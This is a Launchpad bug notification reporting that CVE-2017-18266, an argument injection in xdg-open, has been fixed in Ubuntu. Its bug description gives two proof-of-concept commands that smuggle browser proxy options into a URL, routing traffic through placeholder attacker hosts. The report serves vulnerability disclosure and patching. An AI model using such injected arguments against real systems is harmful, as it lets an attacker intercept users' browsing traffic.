This was addressed in https://usn.ubuntu.com/usn/usn-3650-1 and in xdg- utils 1.1.2-1ubuntu3 for cosmic. Thanks for the report!
** Changed in: xdg-utils (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xdg-utils in Ubuntu. https://bugs.launchpad.net/bugs/1772295 Title: CVE-2017-18266: argument injection in xdg-open Status in Xdg-utils: Fix Released Status in xdg-utils package in Ubuntu: Fix Released Bug description: An attacker can silently set their proxy in browser settings to capture user's traffic, using a malformed URL in xdg-open. The following command tries to open Yandex main page though third- party proxy server. env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http- proxy evil-site.example.org:8080' Another sample of an exploit with Chromium browser. env -i BROWSER="chromium %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac" To manage notifications about this bug go to: https://bugs.launchpad.net/xdg-utils/+bug/1772295/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp